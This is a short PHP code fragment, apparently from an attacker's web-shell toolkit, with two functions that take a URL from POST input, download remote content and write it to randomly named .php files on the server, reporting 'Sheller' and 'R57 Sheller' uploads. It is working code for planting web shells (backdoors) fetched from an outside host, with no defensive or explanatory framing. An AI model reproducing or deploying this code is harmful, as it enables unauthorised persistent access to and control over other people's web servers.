function CopySheller($DIR) { $Sheller = RndName(); $SH_TXT = @$_POST['shellerURL']; $file23 = @file_get_contents("{$SH_TXT}"); if (!$file23) { echo "<font color=red>[+] Can't Open The Sheller File .</font><br>"; } else { $fp23 = @fopen("{$DIR}/{$Sheller}.php", 'w+'); $fw23 = @fwrite($fp23, $file23); if ($fw23) { echo "<font color=green>[+] Uploaded Successful : {$DIR}/{$Sheller}.php</font><BR>"; } @fclose($fp23); } }
function R57_Create() { $R57 = RndName(); $r57_add = @$_POST['r57_txt']; $R57_File = @file_get_contents("{$r57_add}"); if (!$R57_File) { echo "<font color=red>[+] Can't Open The R57 Sheller File .</font><br>"; } else { $fp1 = @fopen("{$R57}.php", 'w+'); $fw1 = @fwrite($fp1, $R57_File); if ($fw1) { echo "<font color=blue>[+] R57 Sheller Upload Successful : {$R57}.php</font><BR>"; } else { echo "<font color=red>[+] No Perm !</font><BR>"; } @fclose($fp1); } }